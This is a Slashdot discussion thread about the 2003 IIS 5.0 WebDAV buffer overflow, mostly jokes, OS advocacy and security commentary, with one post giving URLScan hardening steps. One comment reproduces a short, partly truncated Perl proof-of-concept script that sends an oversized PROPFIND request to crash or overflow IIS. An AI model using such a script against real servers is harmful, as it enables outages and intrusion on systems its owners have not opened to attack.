WebDAV Buffer Overflow Attack Compromises IIS 5.0 384
rf0 writes "Well CERT is reporting a new overflow attack for IIS 5.0. Microsoft has released a bulletin. Better download those patches and fix another security hole." According to this CNET story, Microsoft says that this is already being exploited, at the very least since last Wednesday.
yup (Score:4, Funny)
Re:yup (Score:4, Funny)
-Charlie
(This was origionally menat to be sarcasm, but then I wnet to the windows update and looked at the entire patch list, not the rollups. It really is as bad as I was thinking. As that great philosopher Pepe LaPew says, *LeSigh*.)
Re:yup (Score:4, Funny)
Was that really +5 funny?
I've never had mod points.
Those of us who get mod points weekly are easily amused. Try clicking on the "willing to moderate" box. :)
Patch? (Score:4, Funny)
Well duh, "patch my IIS", it's monday isn't it?
Re:Patch? (Score:5, Funny)
Re:Patch? (Score:2, Funny)
Thursday, Tuesday, Today, Tomorrow.
Re:Patch? (Score:2, Funny)
Ugh (Score:5, Informative)
Comment removed (Score:5, Informative)
Re:Ugh (Score:3, Insightful)
Four things that make WebDav's so
cool
And don't forget to add
WebDAV like SOAP makes it real easy
for developers to sneak your data
thru pesky firewalls using Port 80.
That-a-Way, we can all share all our
Corp Documents with the WFW ( Whole
Effing World )
-- kjh
Re:It's clear that you don't understand security.. (Score:4, Informative)
No, it is clear that *you* don't understand security. Specifically:
Please, get a clue.
/mike
Re:It's clear that you don't understand security.. (Score:3, Informative)
A VPN has end to end encryption that is what makes it secure. Does WebDAV have end to end encryption?
* "using any number of authentication schemes" does not "lock down" anything at all.
If your security depends on authentication schemes you are hosed. You have to have authentication but you also have to have a whole slew of other measures. Which WebDAV does not.
* It doesn't matter if you are running it over HTTP or HTTPS. Both are the wrong protocol to use for f
Re:It's clear that you don't understand security.. (Score:5, Informative)
- WebDAV is *nothing* like a VPN.
A VPN provides secure access to a remote network via one or more untrusted networks, typically the Internet. Once a VPN is established, the local endpoint has access to the remote networks's resources including, but not limited to, file, mail, directory, print and web servers. Existing protocols such as IMAP, POP, HTTP, LDAP, NFS and SMB can be used over the VPN in a mostly secure and transaprent manner.
WebDAV is an extension to HTTP - The Hypertext Transport Protocol. HTTP is deisgned to transport hypertext (hence it's name) and other media over via TCP. WebDAV provides distributed authoring and publishing extensions to HTTP to allow, amongst other things, remote collaboration. Using WebDAV for a network file system is akin to using FTP for the same. It is a bad idea.
=> WebDAV is nothing like a VPN.
- "using any number of authentication schemes" does not "lock down" anything at all.
- It doesn't matter if you are running it over HTTP or HTTPS. Both are the wrong protocol to use for filesharing. Just like using SOAP over HTTP(S).
Doing everything via HTTP, whether running plain text over port 80, encrypted over port 443 or any other combination is bad practice. One of SOAP's (and WebDAV's) "features" is that it allows you to do stuff over HTTP that would usually otherwise be blocked by a firewall. Want to do RPC? Sure! Just tunnel it through port 80! Want to do file sharing? Sure! Just tunnel it through port 80! This is seriously screwed up. It defeats a primary purpose for which firewalls were invented in the first place; to limit access to dangerous services. Not to mention that using HTTP for everything is a serious architectural design flaw as well.
Putting authentication in front of HTTP and/or tunneling it over SSL does not fix these problems. This IIS exploit du-jour is a perfect example of such.
- Web applications are irrevalent to network security.
A web application should be well designed and implemented, with security in mind. It should be deployed on a network which is properly secured. It should be running on systems which are properly securied. Making a web application secure does not make a network secure (and vice versa). "Irrelevant" is probably a too strong a word, but the security of a network should never be dependent on the security of a web application.
/mike
Re:If it were that easy... (Score:2)
Have you tried it with a professionally developed WebDAV server? Get yourself a free account at http://www.sharemation.com and give it a try. You can even write to support@xythos.com if it doesn't work for you (NOTE: it has always worked for me).
Re:Ugh (Score:3, Informative)
Read the links in the posting:
Microsoft Windows 2000 supports the World Wide Web Distributed Authoring and Versioning (WebDAV) protocol. WebDAV, defined in RFC 2518, is a set of extensions to the Hyper Text Transfer Protocol (HTTP) that provide a standard for editing and file management between computers on the Internet. A security vulnerability is present in a Windows component used by WebDAV, and results because the component contains an
Re:Ugh (Score:5, Interesting)
Re:Ugh (Score:5, Informative)
HTH
Re:Ugh (Score:3, Insightful)
Sounds like yet another result of not having a completely well defined API and/or not adhering to it...
Anything between the big-bad-intetnet and operating system internals should check all parameter values and data it passes on to the OS.
Basically, there could be another bug in another dll of windows that WebDAV may someday call, and the same security hole is open again. Especially worr
Another day, another Microsoft bug (Score:4, Funny)
Bah, the Internet (Score:5, Funny)
Re:Bah, the Internet (Score:2)
But there is green beer to be drank, and those 31337 0day haq0rs have had this in their hands for a while...
Re:Bah, the Internet (Score:5, Funny)
Shut the
=D
Re:Bah, the Internet (Score:3, Funny)
dotdash dashdash
dotdash dotdashdotdot dotdashdot dot dotdash dashdotdot dashdotdashdash
dash dotdotdotdot dot dotdashdot dot
dotdashdotdashdotdash
Re:Bah, the Internet (Score:3, Funny)
Re:Bah, the Internet (Score:3, Funny)
You think internet DDoS attacks are bad, just wait until you have 10,000 Pidegons flying straight for you!
Again... (Score:3, Interesting)
Re:Again... (Score:5, Funny)
>change allowed to take over the system?
Because it is "trusted".
Re:Again... (Score:3, Insightful)
Gartner Group (Score:5, Insightful)
If you didn't, well, get with the program!
Eventually MSFT will have to deliver your "mission critical" ASP runtime for Apache, and the world will be a better place because of it.
Re:Gartner Group (Score:2, Interesting)
I remember many moons ago, there was a program that could convert ASP to PHP - I wonder if it still exists and how good it is these days if so..?
Re:Gartner Group (Score:5, Informative)
Are you talking about ASP2PHP over at asp2php.naken.cc [naken.cc]? The biggest things it doesn't seem to support are COM objects and MS SQL Server connections, at least according to the FAQ [naken.cc].
Go Mono! - Re:Gartner Group (Score:2, Interesting)
Why wait for Microsoft when ASP.Net is already being ported [go-mono.com]?
Re:Gartner Group (Score:3, Informative)
http://www.microsoft.com/downloads/detail
Why use IIS? (Score:2, Insightful)
Re:Why use IIS? (Score:3, Flamebait)
Re:Why use IIS? (Score:2)
I'd send them a list of both, along with a list of patch availability time for each hole that was patched, and a list of holes that still remain unpatched.
Frankly, the thing that steams my giblets the most about IIS is the unalterable GMT time-stamping on the W3C log format coupled with the inability to customize the other available (non-GMT stamping) log forma
Apache security alerts? (Score:5, Insightful)
All seven of them? All long fixed? Page not updated since January 23, 2003? I'd LOVE to send them that. Comparing that to the long and varied string of IIS compromises/failures/destruction would be enough to get even the pointiest headed boss to make the switch. Good idea. Thanks!
Re:Apache security alerts? (Score:3, Interesting)
Not only are they older, they almost all have one thing in common: they are for apache on Win32.
Only one or two of the seven affected a UNIX platformed apache.
It seems that the vulns for Win32 revolve around getting the '/' vs '\' right and how they do their path checking.
Re:Why use IIS? (Score:5, Insightful)
A text file can hide options too, but not in the same way. Generally, applications have many defaults that don't need to be defined in the configuration explicitly. A good config file will list most of these anyway, even if commented out (example
That being said, there is no reason that someone putting a server on the internet should be afraid of editing a text file. Even in Windows! Notepad is just fine...
If you're playing on the public internet, you have to put up or shut up (know your shit, or accept the consequences)...
Obviously though, this issue has nothing to do with the WebDAV exploit. Even the best admin is at the mercy of the quality of his/her software (whether UNIX or Windows or $your_os).
-Ben
OMG! (Score:4, Funny)
Re:OMG! (Score:5, Funny)
Re:OMG! (Score:2)
If it was static (in the C sense), an overflow wouldn't smash the stack and there would be no exploit. ;-)
Re:OMG! (Score:3, Informative)
-
-
Hi everybody! (Score:4, Insightful)
Re:Hi everybody! (Score:2)
I am kind of impressed (Score:5, Interesting)
Well, if they are going to have bugs, it is not that bad of a thing as long as they are patched promptly. Then again, many admins do have a tendancy to run unpatched machines.
Re:I am kind of impressed (Score:3, Interesting)
Many of these unpatched boxes are even windows machines.
(No, I'm not slamming windows, or *n?x; but bad admin practices.)
Don't be! (Score:5, Insightful)
Slight problem with that (Score:5, Interesting)
-Charlie
Re:I am kind of impressed (Score:5, Insightful)
MSNBC Posted this article... (Score:5, Informative)
Re:MSNBC Posted this article... (Score:2, Insightful)
"IT'S UNKNOWN WHAT Army computer was attacked, how significant a target it was, or what the intruder's intentions were."
Who said it was a critical system? Critical systems weren't even connected to the internet where I was. Or it could be an inside job?
Re:MSNBC Posted this article... (Score:3, Informative)
I'd uninstall it but... (Score:5, Funny)
Re:I'd uninstall it but... (Score:2)
Q: WebDAV is Real? (Score:3, Interesting)
So is this any kind of standard WebDAV [webdav.org] or just a particular proprietary implementation of similar features in IIS?
I've always been curious about this technology. At one point I even heard talk of a "WebDAV filesystem", but haven't heard of it taking off in any big way yet.
Re:Q: WebDAV is Real? (Score:5, Informative)
If you just want a DAV filesystem, see mod_dav_fs in any recent Apache. (Which DOES run on Windows, for everyone who wants to toss the OS out with the webserver. Not that I'm a fan of Windows for anything, but you can run non-MS servers on the thing.)
A quite-interesting report on MSNBC (Score:4, Interesting)
It seems quite likely to me that that was an under-reported version of this incident [msnbc.com] reported on MSNBC, that permitted an intruder with apparent quite-hostile intent onto US Army sites.
Its a bug...so what? (Score:4, Insightful)
Now, I'm no anti-any OS, I like them all, but what about the latest Sendmail vuln? Or even the one in older versions of BIND? Isn't it true to say that ALL OSes are equally as vulnerable? During the brief time I was on the Redhat Network, I got at least two or three updates a day telling me the sky was about to fall in if I didn't patch my server soon.
I treat all servers fairly, regardless of background, age or reliability :-)
Imagine an equivalent (Score:5, Informative)
The best way to evaluate this bug is to consider an equivalent attack against competitors. In this case, the main competitor is Apache.
Cracking Apache in this way would not give you root. While you might be able to get root by using some other local exploit, it's not the slam-dunk that it is on Windows.
Furthermore, careful admins can run Apache in a sandbox called a "chroot". Properly set up, this means that the attacker can't get to the rest of the system; all they can play with is the Web site.
So, in summary:
Its all Microsoft's fault. Its crap software.
That's a pretty good assessment. The bug itself is a mistake lots of other people have made, but the severity of the mistake isn't.
Re:Nope (Score:3, Insightful)
Perhaps, but IIS runs within kernel space, which is why a remote exploit is always a big deal. Apache may be a bit slower, but runs in user space and thus a remote exploit is less dangerous. So you're right, all OSes/apps aren't equally as vulnerable, but IIS is pretty fucking vulnerable.
Re:Nope (Score:2, Informative)
Re:Nope (Score:3, Interesting)
Granted, I've more experience with Apache than IIS, so if my post was in error its certainly understandable. That was my understanding from previous IIS vs. Apache tests, was that part of IIS ran in kernel mode to serve pages faster, and that was one reason many remote exploits were so serious.
Regardless, we have 2 IIS servers here at work, that are accessible to the Internet, and that has never been a problem. We keep them up to date, run the lockdown tool, so on. It really isn'
CERT can save money... (Score:4, Funny)
Exploited (Score:2)
That could count as a really big argument against not disclosing vulnerabilities as soon as possible? I don't know since when Microsoft is aware of this and making the patch, but if it have time to be developed an exploit
Re:Exploited (Score:2)
did anyone read the microsoft bulletin... (Score:5, Insightful)
Why would you run a IIS server without using the lockdown utility??
We (large corporation) have been using IIS servers and without a problem. With Lockdown/urlscan there are no problems at all. The logs show people trying to get in but being rejected.
I think this story is a bit overblown. It appears that most
cheers
John
Sorry for feeding the trolls, but (Score:4, Insightful)
Your first three paragraphs were quite good and interesting.
Your fourth is full of idiocy.
I think this story is a bit overblown. Umm, not at all. It is quite a serious incident.
It appears that most /.'s don't like microsoft
Tell me, is this the first time you noticed that? Not much analytical thought going on upstairs, is there?and thats sad because microsoft is the driving company behind many many jobs They suck a very disproportionate chunk of money out of the market, they are in a position where innovation is much too risky, they are in such a controlling position that they are even greatly profitable against the trend of the rest of the market. The IBM PC pushed the boom. DOS and Windows have ridden the wave and placed Microsoft in the position of punishing any software company and they keep expanding -- that becomes too successful in the name of feeding their monstrous appetite. DOS and Windows sucked for many years, but were small and people ignored the control that was being given such an unworthy producer.
They drive their own jobs with lots of marketing and billions to spend on research, which would be much better used in a large market of competing thriving software vendors, like we had before Microsoft used monopolistic business models to destroy them all. If you become successful, Microsoft is guaranteed to take it away from you. That is successful for Microsoft and creation of Microsoft jobs, but far from good for America or the world.
The arrival of windows pushed the last boom. No questions about that. Unix had been around for 20 yrs and no boom. Windows and the net and look at how things accelerated..why..because ma/pa people use windows..not *nix. Just the facts.
You mentioned facts? The boom came on the backs of now-defunct companies who pioneered their fields, such as word processing, networking, compilers, OO Languages, etc. none of which was pioneered by Microsoft. But Microsoft was good at using software ownership to take these things away from their innovators. And now you have come full circle to why many developers are congregated here and do not always hold Microsoft in high regard.
But you knew that, didn't you? Perhaps you are AC because your large company is Microsoft?
Re:did anyone read the microsoft bulletin... (Score:2)
Uhm, you do realize that this is Slashdot, right? Of course you do... you cite
You are right though, Microsoft products can be secure. Just like Linux products can be insecure. The difference is in the default.
Re:did anyone read the microsoft bulletin... (Score:2, Insightful)
Yeah, that's why the stock everyone was talking about in 1995 was netscape communications corp. The WEB was the last boom. No questions about that.
Re:did anyone read the microsoft bulletin... (Score:2)
The PC boom was dependant on the web/internet boom. Any OS can run a browser, it just happened that Microsoft was the de facto standard on the PC platform at the time.
If you want to thank anyone for ushering the information age you can start with UIUC's NCSA and Tim Berners-Lee.
Re:did anyone read the microsoft bulletin... (Score:2)
Re:did anyone read the microsoft bulletin... (Score:3, Interesting)
Why would you run a IIS server without using the lockdown utility??
Good point. However, my company advises our clients against running it, mainly because their sysadmins are...not well versed in the arts of running a windows web server. The default configuration for the lockdown tool shuts down everything except for HTML. That includes the ASP engine, which our product requires. If the sysadmin spends a few minutes to go through the list of what to disable and what not to, they're fine.
Sadly, our c
What aspects of URLScan provide protection (Score:4, Interesting)
The MS advisory states that a 'default' URLScan will protect against this. Well
Anyone know?
Re:What aspects of URLScan provide protection (Score:5, Informative)
Quote:
Just to clarify, Microsoft's bulletin states that this vulnerability
could have been prevented using URLScan and/or IISLockdown, but it
isn't really specific on how to do this. Several people have asked me
how this can be done.
The following steps can be used to block the attack:
1. Completely disable WebDAV by setting the
HKLM\SYSTEM\CurrentControlSet\Services\W3SVC
registry key to 1
2. Limit the length of requests (the url and any headers) by setting
the HKLM\SYSTEM\CurrentControlSet\Services\w3svc\para
MaxClientRequestBuffer to something like 16k
3. Block the following WebDAV HTTP verbs using URLScan (either by
specifically blocking them or by not listing them as allowed):
OPTIONS, PROPFIND, PROPPATCH, MKCOL, DELETE, PUT, COPY, MOVE, LOCK,
UNLOCK, OPTIONS, and SEARCH. Note that FrontPage does require the
OPTIONS method to work properly.
4. Block the following WebDAV-related headers using the [DenyHeaders]
section of URLScan.ini:
[DenyHeaders]
DAV:
Depth:
Destin
If:
Label:
Lock-Token:
Overwrite:
Time
TimeType:
DAVTimeOutVal:
Other:
5. If you require WebDAV, you can limit the
length of each individual header with these entries in the
[RequestLimits] section (The exact values are obviously pretty
generic and may need to be increased or decreased based on your
particular configuration):
[RequestLimits]
Max-DAV=250
Ma
Max-Destination=250
Max-If=250
Max-
Max-Lock-Token=250
Max-Overwrite=250
Max-TimeType=250
Max-DAVTimeOutV
Max-Other=250
Microsoft does not specifically state which HTTP Verb and/or header
is affected, but it does say that it is related to WebDAV. I would
therefore assume that setting ACLs on httpext.dll would still be
effective in blocking the attack. The PUT and DELETE methods are
still available in IIS, but only as part of the original HTTP spec,
not part of WebDAV.
Mark Burnett
www.iissecurity.info
Exploited! (Score:5, Funny)
And I thought that Penguin on the Microsoft home page looked at little out of place.
timely patches (Score:2, Interesting)
I'm not bashing either side because *nix has its security issues, too; but last time I saw an exploit with Linux, there was a patch well before any known exploits. I'm not saying the patches to Linux were made before the bug was made public, just that they were available before the bug was exploited.
If there is some cracker out there that has found this bug,
Glad to see they noticed it (Score:2, Interesting)
Why, you may ask, would it be good for one of Apache's competitors to be less buggy (assuming you are arguing from a pro-open source standpoint)? This gives Apache competition. The more competition it has, the more incentive many of its developers will have to improve it.
Wouldn't it just be simpler if slashdot... (Score:3, Funny)
National Security (Score:5, Funny)
In a future near you...
By order of John Ashcroft, Dick Cheney, and Bill Gates, Windows bugs are now a matter of national security. All discussion in this thread is to stop immediately!
---
Seriously, with the Army getting hacked and the continued insistence of elements of the govt and military to use Windows, soon bugs and exploits will be classified as state secrets and we'll stop hearing about them. Soon enough vested FBI agents will be knocking on the door of anyone who opens their mouth...excuse me, someone's at the door...
=======rrrrtwjstoah;!!!!!!!!!
I wonder if it's related to this intrusion.. (Score:4, Insightful)
This is perfect! (Score:2, Funny)
I just ran into a problem today on one of our development web servers, trying to get an ASP to run a windows shell script with particular permissions. Anyway, executing arbitrary code in the Local System Context -- this is just the feature that I've been looking for!
Quite handy solution (Score:5, Informative)
Doesn't help at all (example) (Score:4, Interesting)
Take a look at the World Health Organization South-East Asia web site:
http://w3.whosea.org/index.htm
They're running IIS 4.0. FOUR.POINT.ZERO.
The deface has been there for almost a day with apparently no fix yet
Re:Doesn't help at all (example) (Score:5, Insightful)
I don't agree with that. Microsoft itself can't keep up with the patch schedules; its servers regularly get hacked. Who has more resources than Microsoft? Nobody.
The fact is that if you are running a mission critical server you must test before deploying a patch. That takes time and money that the IT group has in short supply these days.
Then there is the issue of Microsoft's marketting - they sell IIS as the easy to use 'zero maintenance' lowest TCO choice. False advertising in this case.
Windows Update (Score:3, Informative)
Editorial bias? (Score:5, Insightful)
What I do find interesting is that
I'm not griping about having my story rejected, I've had many rejected and a few accepted, and that's the way things are, no problem. What I am questioning is the editorial bias. Here we are at a website which probably has one of the highest concentration of Opera users of any website in the world, and they chose to not post a negative story about "the good guys" (which has exploits in the wild) but did choose to post a negative story about "the bad guys".
Just more of
In Related News.... (Score:3, Insightful)
Thanks guys! (Score:3, Interesting)
So, Danke!
Exploit Code (Karma Whoring) (Score:3, Informative)
#!/usr/bin/perl
# Written by Georgi Guninski
use IO::Socket;
print "IIS 5.0 propfind\n";
$port = @ARGV[1];
$host = @ARGV[0];
sub vv()
{
$ll=$_[0]; #length of buffer
$ch=$_[1];
$over=$ch x $ll; #string to overflow
$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return;
#$xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."$over".':"><a:prop ><a:displayname
# ^^^^ This is another issue and also works with length ~>65000
$xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."over".':"><a:prop><a:displayname
$l=length($xml);
$req="PROPFIND / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n";
syswrite($socket,$req,length($req));
print ".";
$socket->read($res,300);
#print "r=".$res;
close $socket;
}
do vv(128008,"V"); # may need to change the length
sleep(1);
do vv(128008,"V");
print "Done.\n";
Re:This is news? (Score:5, Funny)
Re:This is news? (Score:2, Insightful)
I have nothing against software licenses...Sometimes their implementation is questionable, and more often than not taken for granted by the majority of users, but I see them as a valid way for the writer of the software to place restrictions on its use.
I can, and do, license my stuff under the GPL, LGPL, or BSD license, as the case warrents.
Re:Windows XP? (Score:4, Informative)
Re:OK, so how about (Score:2)
Similar Apache bugs have received 'front page' billing, which is appropriate.
Re:OK, so how about (Score:4, Insightful)
The sendmail security issue certainly did make the front page.
The fact is that the Samba problem is unlikely to be exploitable remotely because Samba is generally not exposed to the Internet. In the case of the MySQL issue, it requires a man-in-the-middle attack to pull off arbitrary code execution. Many protocols are vulnerable to this sort of attack - it is also a type of attack that is very hard to pull off.
Moderators => please mod parent down. The guy is a jackass.
Re:OK, so how about (Score:2)
I'm not talking about the technical niceties of the vulnerabilities or why some are worse than others.
Comment removed (Score:5, Insightful)
Re:There are UNEXPLOITABLE web servers - MacOS ! (Score:4, Interesting)
I am feeding trolls today.
Exploits would be related to the percentage of the web actually using the platform, the number of expansive web software systems available for the platform (if you run Apache, for example, all the same exploits would apply, etc.).
No command shell... My toaster has no command shell, either, and it has never been hacked, so it must be right. Of course, it might be a function of how many useful things you can do with it.
No Root user... What a novel concept. I get it, just throw away all the security model, and then the problems don't qualify as security problems anyway. Pesky security machanisms were just distracting us. Real climbers never use safety ropes, because they just get in the way and cause a false sense of security!
Pascal strings... I have certainly spent many years working with non-null-terminated strings that used a count. It is irrelevant to buffer overflows whether the size is by delimiter or by pre-count. It is a matter of whether the program (or automatic string class) checks to see if the static buffer has room for the new string based upon the sizes of the source strings. I have seen plenty of buffer overflows with counted strings for exactly the same reasons they occur in null-terminated strings.
Macs running Webstar have ability to only run CGI placed in correct directory location and correctly file "typed"...Macs never run code ever merely based on how a file is named. ".exe" suffixes mean nothing! That explains why Macs were not vulnerable to the Word Macro exploits and a variety of other exploits -- oops, they were. Then, perhaps it is just a matter of how popular a platform it is. Let's see, no interesting modern Web Server configurations run on it, so no one uses it, and no one exploits it. A little like my daughter's TI-83, no web exploits against that, either, but it does not support the types of web aplications I want or a reasonable number of users. But no one would bother to write an exploit for it!
this troll again! (Score:5, Informative)
This post is a lot like the "BSD is dying" troll that's just not going away. Every once in a while some idiot posts it, and a few other idiots moderate it up. Anyway, on to debunking.
The MacOS running WebStar and other webservers as has never been exploited or defaced, and are are unbreakable based on historical evidence.
Really? Is that because it crashed every time someone tried to access it? Considering that MacOS does not even have preemptive multitasking or proper memory protection, it's not that hard to imagine. MacOS has a really nice GUI, but in terms of technology it is behind even Windows 95.
In fact in the entire SecurityFocus (BugTraq) database history there has never been a Mac exploited over the internet remotely.
Hmmm, there are no exploits for DOS either. Are we to conclude that DOS is the most secure OS ever?
No command shell...
BFD! If you gain control of a process (through buffer overflow, for example) and manage to execute your own code, you still have complete control of the system. Heck, the current bug in IIS has nothing to do with exploiting shell.
No Root user.
The troll is only getting better. Ladies and gentlemen, it has come to our attention that the competitors' cars have malfunctioning seatbelts and thus cause injuries to passengers in a collision. Our MacCar has no seatbelts, therefore it is not vulnerable to collisions.
You know, IIS also runs as root (or rather LocalSystem in NT terms). By always running as root there is no false sense of security and programming is done carefully. Doesn't seem to help though...
Pascal strings.... As you know Pascal strings (length prefixed) are faster than C...but the side effect is less buffer exploits
...and they are limited to 255 bytes in length. (For those who did not program in pascal, the first character in the char array represents the length of the string. Since unsigned char's maximum value is 255, that's the maximum length of the string). Anyway, a buffer overflow occurs when you try to write more data than you can fit in the buffer. The only way a compiler could prevent that is if it inserts length checks before every write, and either truncates the string or terminates the program. It's been a loooong time since I touched pascal, so I don't remember how it handles that, but in any case it's irrelevant: is WebStar written in Pascal? In fact, besides some legacy code in MacOS, is anything at all written in Pascal these days?
Macs running Webstar have ability to only run CGI placed in correct directory location and correctly file "typed" (not mere file name extension).
Unix running Apache have ability to only run CGI placed in correct directory location and correctly file "typed" (not mere file name extension). (You can't run some random data).
Macs never run code ever merely based on how a file is named. ".exe" suffixes mean nothing!
Unix never run code ever merely based on how a file is named. ".exe" suffixes mean nothing! (You need to set executable permission first).
but the best part is that mac web programs and server tools do not create files with resource forks usually. TOTAL security.
Yeah, and when I leave the house I put my keys under the rug usually. TOTAL security. I mean who would possibly figure out how to create "resource forks" and such?
Stack return address positioned in safer location than some intel Osses.
That is the property of the hardware, not OS. Do you undestand the distinction?
7> There are less macs, though there are huge cash prizes for cracking into a MacOS based WebStar server (typically over $10,000 US). Less macs means less hacker interest
What happened to 5> and 6>? Were those argument too stupid even by your standards?
Anyway, in this paragraph you are contridicting yourself: on the one hand you are claiming that macs are safer because there is less
Yes, indeed... (Score:4, Interesting)
I wrote an FTP server in SML (http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/t
Of course, any language that lets you write interesting programs (ie, "telnetd") will also let you write programs with security holes. (In a sense, telnetd is itself a security hole, provided you have the password!) But having the compiler automatically ensure that the largest class is impossible gives you a lot more time to work on other, more subtle security problems.